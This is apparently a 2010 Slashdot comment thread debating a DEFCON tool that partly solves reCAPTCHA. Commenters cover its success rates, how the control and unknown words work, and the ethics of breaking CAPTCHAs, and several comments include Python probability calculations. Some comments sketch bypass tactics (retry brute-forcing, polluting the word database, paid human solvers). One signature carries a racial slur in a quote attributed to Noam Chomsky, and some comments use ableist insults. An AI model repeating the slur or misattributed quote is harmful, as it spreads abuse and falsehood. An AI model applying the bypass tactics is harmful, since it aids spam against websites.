Re:Can the mouse cursor be positioned by a script? by AusIV · 2010-08-05 10:31 · Score: 1

As a couple of ACs have pointed out, the people breaking CAPTCHAs aren't using browsers, they're using scripts. They don't care if a DOM element is hidden, or if they have to make an extra ajax request of some sort. The scripts will be tailored to the CAPTCHA they're trying to break, and you can't keep a script from getting a hold of something that you plan to show a human.
Re:Can the mouse cursor be positioned by a script? by IBBoard · 2010-08-05 20:09 · Score: 2, Insightful

Remember, iPads and touch-screens can't do hover. Plus there's the whole disability accessibility aspect as well ;)
Re:Can the mouse cursor be positioned by a script? by Anonymous Coward · 2010-08-07 01:32 · Score: 0

You have to think in layers, though: at some point a program running (at the application level, kernel level, hypervisor, something) is completely indistinguishable from an actual person in terms of checks like that. The only way for a captcha to work is to provide a problem that can only be solved by a human, i.e. a Turing test.

I'm a computer, apparently by El_Muerte_TDS · 2010-08-05 09:11 · Score: 2, Funny

It looks like that tool is better at deciphering the captchas than I am.

Re:I'm a computer, apparently by Anonymous Coward · 2010-08-05 21:27 · Score: 0

Funny?? This should be modded INSIGHTFUL !
(Darn, I can't pass Slashdot's CAPTCHA.)

far from it by MagicM · 2010-08-05 09:12 · Score: 3, Informative

I'm watching the video, and the end result is "b:1/78 1.28% s:27/78 34.62%" indicating that out of 78 tests of two words per test it got a single word right 35% of the time, and both words right only once or 1% of the time.

Since both words need to be correct "solve the current CAPTCHA at an efficacy of 1%" would be closer to the truth.

Re:far from it by NegativeK · 2010-08-05 09:18 · Score: 2, Informative

35% * 35% ~ 12%. And that ignores that one word is a known control, while the other is a word they're trying to OCR.

--
This statement is false.
Re:far from it by BarryJacobsen · 2010-08-05 09:21 · Score: 2, Informative

I'm watching the video, and the end result is "b:1/78 1.28% s:27/78 34.62%" indicating that out of 78 tests of two words per test it got a single word right 35% of the time, and both words right only once or 1% of the time.
Since both words need to be correct "solve the current CAPTCHA at an efficacy of 1%" would be closer to the truth.
My understanding is that only one of the words needs to be correct, but it has to be the "right" one (reCAPTCHA presents two words: one it is very certain about and one it is less certain about. You have to get the one it is very certain about in order to pass).

--
Track your TV Shows with your iPhone - FREE
Re:far from it by Anonymous Coward · 2010-08-05 09:23 · Score: 0

RTFA, both words don't need to be correct. ReCAPTCHA works by showing you two images, one known and one that OCR cannot currently read. The one OCR cannot read is completely unknown, so if you get it totally wrong, obviously ReCAPTCHA will not know and let you pass anyway.
Re:far from it by Anonymous Coward · 2010-08-05 09:25 · Score: 0

I'm watching the video, and the end result is "b:1/78 1.28% s:27/78 34.62%" indicating that out of 78 tests of two words per test it got a single word right 35% of the time, and both words right only once or 1% of the time.
Since both words need to be correct "solve the current CAPTCHA at an efficacy of 1%" would be closer to the truth.
You are wrong. Only one word needs to be correct. One word is the control word and one is from some book recaptcha is helping to digitize. Learn about recaptcha before going all retard.
Re:far from it by MagicM · 2010-08-05 09:33 · Score: 1

All I'm saying is that just because the algorithm got 30% of the words right doesn't mean that it can "solve the current CAPTCHA at an efficacy of 30%".
Re:far from it by Anonymous Coward · 2010-08-05 09:37 · Score: 0

Learn about recaptcha before going full retard.
FTFY
Re:far from it by MagicM · 2010-08-05 09:39 · Score: 1

Actually I guess that's not what I'm saying, because I said "1%" which was wrong. You may consider my face egged.
Re:far from it by sexconker · 2010-08-05 09:42 · Score: 1

Only ONE word needs to be correct for recaptcha.
There is a known word you are tested against, and an unknown word pulled from a database of shit they scanned.
Solving the known word correctly means you probably also got the unknown word correct. They then pool the "correct" submissions for the unknown words and see what the most common ones are.
I don't know if this is completely automated or if they have an intern monkey clicking "yes" or "no" for unknown words and probable solutions, but the whole "crowd sourcing OCR for a bunch of shit we scanned" is the POINT of recaptcha.
Re:far from it by sexconker · 2010-08-05 09:45 · Score: 1

All I'm saying is that just because the algorithm got 30% of the words right doesn't mean that it can "solve the current CAPTCHA at an efficacy of 30%".
Yes, yes it fucking does.
"Solving" a captcha - to an attacker or a legitimate user - means getting past the damned popup and creating your account, posting your /. obama poop copypasta troll, etc.
Being correct with regards to the OCR means nothing.
Re:far from it by rm999 · 2010-08-05 09:45 · Score: 2, Informative

You are right, there is no need to get both words right.
But, your 35% * 35% calculation assumes the recognition difficulty of the words is independent, which is a bad assumption in this case; the OCR word is one that is known to be hard to guess. It is probably more like 35% * 5% or something.
Re:far from it by IICV · 2010-08-05 09:51 · Score: 1

Not necessarily; I'm not sure exactly how reCAPTCHA works, but in theory they don't know one of the words - in fact, that other word may very well be unknowable, due to smearing or just not being a word (that happened to me the other day actually, I got one word and one thing that looked like a Farsi character). Thus, if you successfully guess the correct thing for the "known" word, it doesn't really matter what you guess for the "unknown" word as long as it's close or at least something a human might type.
Therefore, making the big assumption that this system correctly guesses both "known" and "unknown" words with equal chance, the algorithm's expected "win" percentage would be about 17%, not 1% as you claim.
Of course, I bet you anything that if reCAPTCHA gets a lot of wrong answers from a given IP address, they'll start sending pairs of known words in order to detect this sort of thing and to prevent pollution of their databases. That would give this algorithm a 1% win chance.
Re:far from it by hydrofix · 2010-08-05 09:53 · Score: 5, Informative

Since both words need to be correct "solve the current CAPTCHA at an efficacy of 1%" would be closer to the truth.
Actually, that is incorrect. One word is already positively known by the OCR and serves as a control, while the other is the one that the OCR could not read. It will of course only check the one that it knows, and assume the other one is then correct as well. So, if you get one of the words correct AND this is the same word that their OCR identified correctly (which is very likely the case), then you pass, but most of the time (99%) you give a bad answer for the harder, non-OCR word. Sadly, this leads to pollution of their database in the long run.
Re:far from it by Anonymous Coward · 2010-08-05 10:10 · Score: 0

Does this mean that if a lot of people were to consistently type the first word correctly, but enter "gnu" for the second word, they would pollute its database but still pass the test half the time?
Re:far from it by retchdog · 2010-08-05 10:15 · Score: 2, Insightful

Interesting. If this is true as stated, and one knew/modeled OCR performance, you could use this information in some cases to pick out the plum and boost the crack...

--
"They were pure niggers." – Noam Chomsky
Re:far from it by petermgreen · 2010-08-05 10:30 · Score: 1

I seem to remember reCAPTCHA claiming that if they think they are being screwed with, they switch to sending two known words rather than one known and one unknown.

--
note: i'm known as plugwash most places but i screwd up registering that here somehow in the past and now can't register
Re:far from it by mugurel · 2010-08-05 10:37 · Score: 1

35% * 35% ~ 12%.
35% corresponds to P(A or B), not P(A), and you don't know whether P(A)=P(B), nor whether A and B are independent.
P(A or B) = P(A) + P(B) - P(A and B)
.35 = P(A) + P(B) - .01
P(A) + P(B) = .35 + .01 = .36
If we assume that P(A) = P(B) = .36/2 = .18, then that implies that A and B are not independent, since .18*.18 != .01. And if they are independent, so that P(A and B) = P(A)P(B), then P(A) and P(B) cannot be equal.
It looks more likely that P(A) and P(B) are independent and unequal, than that P(A) and P(B) are equal and dependent. It could be that the first word is often shorter than the second (or v.v.).
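
For anyone who wants to check the arithmetic above, here is a minimal sketch in Python. It takes the two figures from the video at face value (0.35 read as P(A or B), 0.01 as P(A and B)) and additionally assumes independence, which the post itself only calls "more likely". The function name `solve_independent` is made up for illustration.

```python
import math


def solve_independent(p_either: float, p_both: float) -> tuple[float, float]:
    """Return (larger, smaller) per-word probabilities, assuming independence.

    Inclusion-exclusion gives P(A) + P(B) = P(A or B) + P(A and B), and
    independence gives P(A) * P(B) = P(A and B), so P(A) and P(B) are the
    two roots of x**2 - total * x + p_both = 0.
    """
    total = p_either + p_both
    disc = total * total - 4.0 * p_both
    if disc < 0:
        raise ValueError("inputs are not consistent with independent events")
    root = math.sqrt(disc)
    return (total + root) / 2.0, (total - root) / 2.0


if __name__ == "__main__":
    easy, hard = solve_independent(0.35, 0.01)
    print(f"P(easier word) = {easy:.3f}, P(harder word) = {hard:.3f}")
```

Under those assumptions one word comes out at roughly 33% and the other at roughly 3%, which fits the guess that the two words differ a lot in difficulty.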
Re:far from it by retchdog · 2010-08-05 10:42 · Score: 1

meh. never mind. it'd only take twice as long at most, to just do your best on both. duh.
i guess if there were a limited number of attempts you might use this to decide which ones to attempt vs. reload.

--
"They were pure niggers." – Noam Chomsky
Re:far from it by Anonymous Coward · 2010-08-05 10:55 · Score: 0

There was a bit regarding recaptcha and 4chan. Apparently they hardened their system against such an attack.
Re:far from it by mysidia · 2010-08-05 11:04 · Score: 1

The order is random... you don't know which word is the first word and which is the less-certain one. Only reCaptcha knows that.
Re:far from it by Anonymous Coward · 2010-08-05 11:49 · Score: 0

Even if the probabilities are independent, if the algorithm gets at least 1 of the 2 correct 35% of the time, one should expect its probability of success per-word to be about 19.4%. (2p - p^2 = 0.35.) p^2 = 3.75%, not inconceivable given the small sample size.
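
The 19.4% and 3.75% figures can be reproduced with a few lines of Python. This is only a sketch of the calculation in this comment: it assumes both words are equally hard and independent, and reads the video's 35% as "at least one word right". The name `per_word_rate` is invented for the example.

```python
import math


def per_word_rate(at_least_one: float) -> float:
    """Solve 2p - p**2 = at_least_one for the per-word success rate p.

    Equivalent form: 1 - (1 - p)**2 = at_least_one,
    hence p = 1 - sqrt(1 - at_least_one).
    """
    if not 0.0 <= at_least_one <= 1.0:
        raise ValueError("at_least_one must be a probability")
    return 1.0 - math.sqrt(1.0 - at_least_one)


if __name__ == "__main__":
    p = per_word_rate(0.35)
    print(f"per-word rate p       = {p:.4f}")
    print(f"both words right p**2 = {p * p:.4f}")
    # Expected number of both-right results in a 78-test run like the video's.
    print(f"expected in 78 tests  = {78 * p * p:.2f}")
```

The last line gives the expected count of both-right results for 78 tests, to compare against the single one observed in the video.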
Re:far from it by omnibit · 2010-08-05 12:12 · Score: 1

Mod parent up - I'm out of points!
Re:far from it by Anonymous Coward · 2010-08-05 12:17 · Score: 0

That's interesting. I didn't know that so many of the garbled words were "penis", like I was typing.
Re:far from it by Jorl17 · 2010-08-05 13:20 · Score: 4, Informative

This is not informative, as many have said. If you read http://www.google.com/recaptcha/learnmore , you'll get it.

Here is the deal: reCAPTCHA presents two words. One is picked by it and is previously known. The other one is a word from a book that has been scanned. Said word is unknown to the reCAPTCHA system. When the user enters both words, reCAPTCHA checks to see if the known word has been properly recognized. If that is the case, then reCAPTCHA can assume that a human is answering. Given that a human is answering, the second, unknown word given by the human is most likely correct, because he/she will be able to recognize it as well. Using this system, reCAPTCHA works as a CAPTCHA (spam prevention) mechanism and also helps transform old books/papers, such as the New York Times, into digital format.

So, in practice, only one word has to be correct -- the word that reCAPTCHA knows. What's sad is that bots may contribute incorrect second words...

Next time, get informed before going all crazy.

And here is the relevant info, quoted from the aforementioned website:

reCAPTCHA improves the process of digitizing books by sending words that cannot be read by computers to the Web in the form of CAPTCHAs for humans to decipher. More specifically, each word that cannot be read correctly by OCR is placed on an image and used as a CAPTCHA. This is possible because most OCR programs alert you when a word cannot be read correctly. But if a computer can't read such a CAPTCHA, how does the system know the correct answer to the puzzle? Here's how: Each new word that cannot be read correctly by OCR is given to a user in conjunction with another word for which the answer is already known. The user is then asked to read both words. If they solve the one for which the answer is known, the system assumes their answer is correct for the new one. The system then gives the new image to a number of other people to determine, with higher confidence, whether the original answer was correct.
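
The scheme quoted above can be sketched roughly as follows. This is a toy model of the description on that page, not reCAPTCHA's actual code: the names (`passes`, `UnknownWord`, `submit`), the case-insensitive matching, and the vote thresholds (`min_votes`, `min_share`) are all assumptions made for illustration.

```python
from collections import Counter
from typing import Optional


def normalize(word: str) -> str:
    # Assumed matching rule: ignore case and surrounding whitespace.
    return word.strip().lower()


def passes(control_truth: str, control_guess: str) -> bool:
    """Only the known (control) word decides whether the user passes."""
    return normalize(control_guess) == normalize(control_truth)


class UnknownWord:
    """Collects guesses for a word the OCR could not read."""

    def __init__(self, min_votes: int = 3, min_share: float = 0.75) -> None:
        self.votes: Counter = Counter()
        self.min_votes = min_votes    # hypothetical threshold
        self.min_share = min_share    # hypothetical threshold

    def record(self, guess: str) -> None:
        self.votes[normalize(guess)] += 1

    def consensus(self) -> Optional[str]:
        """Return the agreed transcription, or None if there is no agreement yet."""
        total = sum(self.votes.values())
        if total < self.min_votes:
            return None
        word, count = self.votes.most_common(1)[0]
        return word if count / total >= self.min_share else None


def submit(control_truth: str, control_guess: str,
           unknown: UnknownWord, unknown_guess: str) -> bool:
    """Check the control word; keep the other guess only if the control matched."""
    ok = passes(control_truth, control_guess)
    if ok:
        unknown.record(unknown_guess)
    return ok
```

In this model a bot that gets the control word right still passes no matter what it types for the second word, which is exactly the database pollution people are worried about in this thread.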

--
Have you heard about SoylentNews?
Re:far from it by 42forty-two42 · 2010-08-05 16:07 · Score: 1

Since recaptcha only actually checks one of the words, you actually have a 0.35 * 0.50 chance, or 17.5% chance of success. Of course, since google will just plug this back into their OCR algorithms, and recaptcha only uses things their OCR algorithms failed on in its captchas, any such advances are only temporary in nature.
Re:far from it by twocows · 2010-08-05 22:09 · Score: 1

That's not true, though. The way reCaptcha works is that only one word needs to be correctly solved. It's actually relatively easy for a human to tell which one needs to be solved; it's often the longer one or the one with unusual characters.
Re:far from it by twocows · 2010-08-05 22:11 · Score: 1

Er, the longer one or the one with unusual characters that *doesn't* need to be solved, that is.
Re:far from it by delinear · 2010-08-06 00:42 · Score: 1

It's a little confusing, but the presentation seems to suggest that if you get one of the words wrong too many times in succession (32, it claims), it will log your IP and force you to get both right (I'm not sure how that works; maybe it uses a word with a large number of identical responses, or maybe it just generates two words it knows). It doesn't say whether this is reset after you have successfully got both right. If it is, you could still brute force it (the counter would reset after an average of 100 entries if there's a 1% chance of matching both, in which case for every 132 entries you'd still get about a quarter of them through, which is not a bad hit rate). If not, the suggestion is "dynamic IP", which is not particularly useful if you plan to spam thousands of these things.
Re:far from it by delinear · 2010-08-06 00:46 · Score: 1

You can make a reasonable guess as a human - the unknown word is usually unknown for a reason (archaic type rendering two letters together, an ink smudge on one letter, etc) which a human can spot with reasonable accuracy once they know the trick. If they introduced some of these tricks on the known words they might make it more difficult (and of course, just because a human can spot the difference reliably, doesn't mean it's easy to do in software, as supported by the results in the video).
Re:far from it by delinear · 2010-08-06 00:52 · Score: 1

That depends - you say you're assuming there's an equal chance of spotting a known and an unknown word. It's more likely that his software is better at recognising the word that has been generated by an algorithm rather than some randomly obscured word (that was then run through the algorithm), so while the success rate for two known words might not be 30% there's a good chance that it would be better than 1%, since that figure is factoring in the ability to recognise a word that even Google's OCR couldn't reliably recognise.

The video shows nothing but failures by Anonymous Coward · 2010-08-05 09:12 · Score: 0

It isn't sufficient to get 30% of the characters right. "im bailiwick" is recognized as "iffy ballboy" and that result gets a 32.73% rating. Doesn't look broken to me.
Now 30% of the captchas, that would be something.

Re:The video shows nothing but failures by sexconker · 2010-08-05 09:49 · Score: 1

The percentages shown are a running total of all the captchas tested against in that run.
b is the % of cases where BOTH words were correctly recognized
s is the % of cases where AT LEAST ONE word was correctly recognized
You only need to know ONE word to pass a recaptcha captcha. Though it has to be the CORRECT word, and I don't know if the developers of this program knew which word was known, or if they took that into account when displaying the percentages.
The worst case scenario is that they can solve it about 1/6th of the time (getting one right 1/3 of the time, and having it be the right one 1/2 of those times). It stands to reason, however, that the "known" captchas (the ones recaptcha tests against) are the ones that are easier to solve, and thus, the actual success rate is indeed about 33%.

Plugin not needed... by knarf · 2010-08-05 09:13 · Score: 3, Informative

There's probably an excellent Firefox plugin to render this page's color scheme more bearable

No plugin needed:

View->Use Style->None

That is what it looks like in Seamonkey, Firefox will be similar. This more or less always works.

--
--frank[at]unternet.org

Re:Plugin not needed... by interval1066 · 2010-08-05 09:47 · Score: 1

Or, if you're using FF 3.6: View->Page Style->No Style.

--
Python: 'And then suddenly you have a language which says "we're all stuck with whatever the whiniest coder wants".'
Re:Plugin not needed... by c++0xFF · 2010-08-05 10:32 · Score: 1

This more or less always works.
You're not joking: it even makes the Time Cube site somewhat readable!

Hmm by Tailhook · 2010-08-05 09:15 · Score: 5, Funny

Should I run the DEFCON presenter's giant SWF or not?

o_O

--
Maw! Fire up the karma burner!

Re:Hmm by machxor · 2010-08-05 09:25 · Score: 2, Funny

Why not? You run Firefox, right? If yes, then you have no worries because it's not full of holes like IE is...
Re:Hmm by Chad+Birch · 2010-08-05 09:33 · Score: 1

You are disturbingly misinformed.

--
Sturgeon was an optimist.
Re:Hmm by machxor · 2010-08-05 09:45 · Score: 1

And you don't understand sarcasm... Or maybe I fail at it... Either way, cheers :-)
Re:Hmm by Monkeedude1212 · 2010-08-05 10:06 · Score: 2, Insightful

I'm glad YOUR common sense kicked in before hundreds of others.

Bad Hacking by pz · 2010-08-05 09:16 · Score: 4, Insightful

Why would anyone want to do this? It's like attacking the UN peacekeeping troops or the Red Cross. reCAPTCHA is doing good work, digitizing scanned printed books so that the text can be made available for online searching. Breaking reCAPTCHA is like defecating in the village well, ensuring that everyone suffers. No one benefits from reCAPTCHA being broken. No one.

--

Put my fist through my alarm clock with its ding-dong death inside my ear. - The Blackjacks.

Re:Bad Hacking by Anonymous Coward · 2010-08-05 09:26 · Score: 0

reCAPTCHA is used by a lot of web services to prevent spamming. Breaking it would allow spammers to infiltrate new websites.
The breaking of reCAPTCHA benefits a very select group of people (spammers) and hurts the rest of us.
Re:Bad Hacking by kyrio · 2010-08-05 09:28 · Score: 2, Informative

4chan already broke it.
Re:Bad Hacking by Dhalka226 · 2010-08-05 09:31 · Score: 5, Insightful

No one benefits from reCAPTCHA being broken. No one.
Spammers.
Re:Bad Hacking by Anonymous Coward · 2010-08-05 09:31 · Score: 0

Seriously? It's a security tool that administrators rely on. If it's breakable, someone will find a way. If a good person finds a flaw, I would hope like hell they let the world know.
Re:Bad Hacking by maxume · 2010-08-05 09:32 · Score: 5, Insightful

Actually, it could be of use to reCAPTCHA, they can just pass their test words through this system before they make them public and then use the output to help prevent similar attacks.

--
Nerd rage is the funniest rage.
Re:Bad Hacking by Anonymous Coward · 2010-08-05 09:34 · Score: 0

Perhaps. But what if someone else does the same thing but doesn't bother to say that they did it? Some of these are used to create accounts. Now those accounts could then be used to spam (what most of these scumbags are after) the forums behind the code.
I would rather know about it than have a mysterious 'yeah well maybe someone is hacking it'. It may lead to a better one?
Re:Bad Hacking by Purity+Of+Essence · 2010-08-05 09:35 · Score: 1

Advertisers benefit. Or rather, people who sell advertising and SEO services and work automated lead/sales referral systems. Their clients are probably hurt by all the forum spam done in their name. Look around you. Wherever there is money being made, there are assholes joining in.

--
+0 Meh
Re:Bad Hacking by rbcd · 2010-08-05 09:37 · Score: 1

The field of AI is advanced as CAPTCHAs are broken (eg: OCR). The great thing is that spammers work on this for us, too. When humans and computers cannot be separated, then we'll have computers that can pass the Turing test. AI research will have finished.
Re:Bad Hacking by Anonymous Coward · 2010-08-05 09:40 · Score: 0

Because they already knew how to do it. Now you know, and so do the reCAPTCHA folks.
Re:Bad Hacking by Flyne · 2010-08-05 09:42 · Score: 4, Insightful

The problem of breaking reCAPTCHA is precisely the same problem as increasing computer OCR abilities, since reCAPTCHA by design uses words which current OCR abilities are inadequate for. This is a good thing for AI and computer vision and text digitization.
Re:Bad Hacking by maxume · 2010-08-05 09:45 · Score: 1

Right, because human level intelligence is the obvious upper limit.

--
Nerd rage is the funniest rage.
Re:Bad Hacking by beothorn · 2010-08-05 09:53 · Score: 1

If it can be broken it must be broken.
Re:Bad Hacking by sbayless · 2010-08-05 09:58 · Score: 5, Insightful

No one benefits from reCAPTCHA being broken. No one
You couldn't be more wrong. Sure, breaking reCAPTCHA would create a headache for website admins (including me, for example), but in order to break reCAPTCHA someone has to devise a better text recognition program. And that's great news! This is an example of a general side effect of the cat and mouse game that is captchas. Captchas are a simple form of Turing Test, where website admins are trying to determine who is a computer and who is a real human being. Every time a captcha gets broken, we get a sophisticated new algorithm for doing something that previously only humans could do (or only humans could do well, at least).
Re:Bad Hacking by rbcd · 2010-08-05 10:01 · Score: 1

That's an entirely separate and irrelevant discussion.
Re:Bad Hacking by Anonymous Coward · 2010-08-05 10:05 · Score: 0

Since we tend to consider people that think like ourselves as intelligent, then yes. (Ever heard someone say "Great minds think alike"? Wouldn't it be more likely that average minds think alike?)
If we run into something that is more intelligent than humans (Assuming that we have not done that yet.) we would probably just think it was stupid just because it didn't reach the same conclusions that we did.
I think you are absolutely correct here. By our current definitions human intelligence is indeed the upper limit.
Re:Bad Hacking by Anonymous Coward · 2010-08-05 10:27 · Score: 0

Not quite. If someone were to break reCAPTCHA with a nearly perfect success rate, the same algorithms could be very useful for digitizing old books. If reCAPTCHA becomes completely obsolete, this would mean that their work is done and all the old books can be automatically digitized at last.
Re:Bad Hacking by cant_get_a_good_nick · 2010-08-05 11:07 · Score: 1

It's not about breaking reCaptcha, it's about avoiding the reCaptcha hurdle on all the sites that use it. If a site put up a captcha, there's some resource it's protecting that other people want. This is a way to get it in a bulk way, therefore economically cheaper.
And you think that a person who can benefit with a fat check will care about some abstraction that they're polluting the village well? For money, people sell drugs that kill people. This is nothing compared to that.
Re:Bad Hacking by mysidia · 2010-08-05 11:09 · Score: 2, Insightful

reCaptcha, and indeed all Captchas have a fundamental flaw.... advances in computer vision will eventually render them all obsolete.
Most of the CS knowledge is already around to totally defeat captchas of this sort... it's only an Engineering question. They will most likely get broken when sufficiently unethical engineers are hired by sufficiently wealthy spammers.
It's basically a known fact, that spammers will eventually break conventional captchas totally, by developing algorithms to guess captcha answers. It's only a question of when and how long will it take them to figure out all the systems that matter.
This does not mean it is a respectable thing for people to specifically target Captcha and attempt to hasten its demise.
reCaptcha is a big one... but there are other Captcha systems that matter (like Google's).
And there are other ways around them besides software algorithms... Amazon-style mech turk, for example... find a few thousand folks in certain countries to pay $0.05/hour for breaking captchas, and suddenly reCaptcha is no longer a boundary.
Re:Bad Hacking by Timmmm · 2010-08-05 11:10 · Score: 3, Insightful

The problem of breaking reCAPTCHA is precisely the same problem as increasing computer OCR abilities
No it isn't. Well, not unless you read books with wavy crossed-out words and don't mind 30% accuracy.
Re:Bad Hacking by mysidia · 2010-08-05 11:12 · Score: 1

A 30% recognition rate is no good for useful OCR. It's only that beneficial when breaking Captchas.
30% just means you have to retry the captcha a few times.
Re:Bad Hacking by mysidia · 2010-08-05 11:14 · Score: 2, Insightful

Except the algorithm doesn't really do that... to defeat the captcha, it only needs to get it right about 10 or 20% of the time, to give the malicious script a "good enough guess" to brute-force the Captcha with 5 or 6 retries.
As long as the number of retries is less than what a fair percentage of humans require....
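
To put numbers on the retry argument, here is a small Python sketch. It assumes every attempt is an independent try with the same per-attempt success rate and that the site imposes no lockout, neither of which is guaranteed by anything in the presentation. The function names are made up for the example.

```python
import math


def success_within(p: float, attempts: int) -> float:
    """Chance of at least one success in `attempts` independent tries."""
    if not 0.0 <= p <= 1.0 or attempts < 0:
        raise ValueError("need 0 <= p <= 1 and attempts >= 0")
    return 1.0 - (1.0 - p) ** attempts


def attempts_needed(p: float, target: float) -> int:
    """Smallest number of tries whose cumulative success chance reaches `target`."""
    if not (0.0 < p < 1.0 and 0.0 < target < 1.0):
        raise ValueError("p and target must be strictly between 0 and 1")
    return math.ceil(math.log(1.0 - target) / math.log(1.0 - p))


if __name__ == "__main__":
    for p in (0.10, 0.20):
        for n in (5, 6):
            print(f"p={p:.2f}, {n} tries -> {success_within(p, n):.1%}")
    print("tries for a coin-flip chance at p=0.20:", attempts_needed(0.20, 0.5))
```

With a 20% per-attempt rate, five or six tries already succeed about two times out of three, which is the point being made here: a recognizer far too weak for real OCR can still be good enough against a captcha that allows retries.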
Re:Bad Hacking by cant_get_a_good_nick · 2010-08-05 11:17 · Score: 1

4chan didn't quite break it; it was more that they broke Time's form implementation. They did a lot of 'hacks', but most of them exploited how Time handled the poll: Time didn't use any CAPTCHA at the beginning, then took the form offline but not the voting script, so 4chan voted well past the cutoff time, with millions of monkeys voting.
see reCaptcha blog and this well written article
Re:Bad Hacking by Anonymous Coward · 2010-08-05 11:31 · Score: 0

Incorrect. Captchas are meant to be broken. Once the overlap between bad human readers and good computer readers is sufficient, then we can consider the problem of machine reading to be solved. Then you find the next hard AI problem and make a captcha for that.
Re:Bad Hacking by shird · 2010-08-05 11:45 · Score: 1

No the OP is pretty much right. 4chan has now implemented reCaptcha, yet is still getting hammered with spam. Thus some spammer using 4chan has managed to find a way around it with a pretty good success rate.

--
I.O.U One Sig.
Re:Bad Hacking by Osso · 2010-08-05 12:17 · Score: 1

Lots of books are less than 30% accurate :)
Re:Bad Hacking by lennier · 2010-08-05 13:39 · Score: 1

No one benefits from reCAPTCHA being broken. No one.
But wouldn't a universal algorithmic crack for reCAPTCHA imply an algorithm that could automatically tell the difference between a correct OCR transcription and nonsense? So just fold that algorithm into future open-source OCR libraries and watch the recognition rate soar. We're using black hat hackers to write AI code for us, and everyone wins! *
* Except John Connor, after Skynet starts reading the Hollywood rejected scripts vault.

--
You are not a brain: http://books.google.com/books?id=2oV61CeDx-YC
Re:Bad Hacking by bill_mcgonigle · 2010-08-05 15:20 · Score: 1

I went to a talk by one of their founders last year. The company philosophy is that the day their business is obsolete will be a great day for humanity.
That's pretty rare.

--
My God, it's Full of Source!
OUTSIDE_IP=$(dig +short my.ip @outsideip.net)
Re:Bad Hacking by orange47 · 2010-08-05 18:02 · Score: 0, Redundant

no, not just spammers. millions of people would be free of it.
Re:Bad Hacking by discord5 · 2010-08-05 19:49 · Score: 1

Why would anyone want to do this?
Because CAPTCHA in essence is a flawed system, also because it's a fun "puzzle" and if you don't try to solve it someone else will.

It's like attacking the UN peace keeping troops or the Red Cross.
That's an overstatement if I've ever seen one, like that guy who posted here saying he felt raped when his employer didn't pay him. People just love to make controversial statements on slashdot. "Oh my god, someone found a bug for SSH and wrote an exploit. It's like that time some guy bashed in the window of my car with a rock and took my laptop, only to look up my personal information, come to my home and abduct my dog for ransom."

Breaking reCAPTCHA is like defecating in the village well, ensuring that everyone suffers. No one benefits from reCAPTCHA being broken. No one.
reCAPTCHA is about CAPTCHAs, and using CAPTCHAs to get stuff digitized. No matter how "good" the intentions are, the captcha system is horribly flawed and there is an increasing number of libraries popping up to break captchas. I would say that any real advance made in breaking captchas has the benefit of giving us better OCR in the short run, and in the long run maybe we get to see a better solution for the problems captchas try to deal with.
Anyway, if this guy isn't trying it, a clever spammer will and trust me, they are trying. Captcha protected sites aren't really that impervious to spam lately.
Re:Bad Hacking by xtracto · 2010-08-05 20:32 · Score: 1

That, and a better JDownloader ^_^

--
Ubuntu is an African word meaning 'I can't configure Debian'
Re:Bad Hacking by whm · 2010-08-05 20:34 · Score: 1

No, it's a win-win situation. If they cannot solve reCAPTCHA then we get website security. If they do solve it, it means that we can digitize all of that content without any human interaction. This is great news.
Re:Bad Hacking by DrXym · 2010-08-05 20:37 · Score: 1

Well, if some hacker can crack reCAPTCHA then so can some random spammer. I run a website with captcha protection and the ratio of spambots to real humans has reached epidemic proportions. 95% of new applicants are spambots, meaning they have managed to crack the image despite it being set to the maximum setting. Fortunately all new registrants require approval, so even if they pass the captcha I can still weed them out, but it's still a pain in the arse.
Captcha schemes are quite good but they are vulnerable to a class break. I'm currently considering creating a unique challenge for my site to stop this crap. I think if I put a simple form next to it that had to be filled in it would stop the drivebys dead.
Re:Bad Hacking by Anonymous Coward · 2010-08-05 23:02 · Score: 0

Breaking reCAPTCHA is like defecating in the village well, ensuring that everyone suffers.
Welcome to the world of black hats
Re:Bad Hacking by orasio · 2010-08-06 00:40 · Score: 1

Why would anyone want to do this? It's like attacking the UN peace keeping troops or the Red Cross. reCAPTCHA is doing good work, digitizing scanned printed books so that the text can be made available for online searching. Breaking reCAPTCHA is like defecating in the village well, ensuring that everyone suffers. No one benefits from reCAPTCHA being broken. No one.
Good OCR is more valuable than good captchas.
Re:Bad Hacking by Anonymous Coward · 2010-08-06 00:51 · Score: 0

I don't think you quite understand 4chan. Most of the spammers are so weird that I wouldn't be surprised if they are actually filling out the CAPTCHA for each spam.
Of course, there might be a flaw in 4chan's posting system, but they have an [un]surprisingly robust system.
Re:Bad Hacking by delinear · 2010-08-06 01:17 · Score: 1

I think the point is more that, once a computer can simulate the best of human thinking, it will be more productive to have the computer think about these issues. The computer can process the data faster and doesn't need food or sleep, and it's far easier to duplicate a computer process multiple times than to create more genius level humans (not to mention far quicker, none of that messy growing up and puberty stuff to deal with, just load the disk image and go).
Re:Bad Hacking by maxume · 2010-08-06 01:46 · Score: 1

So when I unpack "AI research will have finished." I am supposed to realize that the statement is qualified to humans doing AI research and that the research itself will really have just gotten started?

--
Nerd rage is the funniest rage.
Re:Bad Hacking by pz · 2010-08-06 09:05 · Score: 1

No one benefits from reCAPTCHA being broken. No one
You couldn't be more wrong. Sure, breaking reCAPTCHA would create a headache for website admins (including me, for example), but in order to break reCAPTCHA someone has to devise a better text recognition program. And that's great news! This is an example of a general side effect of the cat and mouse game that is captchas. Captchas are a simple form of Turing Test, where website admins are trying to determine who is a computer and who is a real human being. Every time a captcha gets broken, we get a sophisticated new algorithm for doing something that previously only humans could do (or only humans could do well, at least).
No. No, no, no. Doing research into OCR and publishing the results is fantastic. It makes the world a better place.
Showing that you have written software to cheat a system that is in wide use to benefit society is morally wrong. It is bad.
Devising a better Turing test is good, coming up with a way of cheating the current one is bad.
Devising a better way to recognize counterfeit currency is good, coming up with a new way to counterfeit currency is bad.
Constructive behavior, good; destructive behavior, bad. Do I need to make it clearer?
Breaking reCAPTCHA is bad.

--

Put my fist through my alarm clock with its ding-dong death inside my ear. - The Blackjacks.
Re:Bad Hacking by Anonymous Coward · 2010-08-06 13:37 · Score: 0

reCAPTCHA benefits from it by knowing that its algorithms are flawed, and having the opportunity to improve them. Or would you rather that the discoverers of the flaws stayed quiet and hoped that no spammers discovered the flaws first?

Readability by pgn674 · 2010-08-05 09:19 · Score: 1

There's probably an excellent Firefox plugin to render this page's color scheme more bearable.

I like using a Readability bookmarklet in my bookmarks bar: Readability - An Arc90 Lab Experiment

Now i by Anonymous Coward · 2010-08-05 09:24 · Score: 0

GETCHA

an excellent Firefox plugin: by Anonymous Coward · 2010-08-05 09:26 · Score: 0

Try hitting ctrl-a.

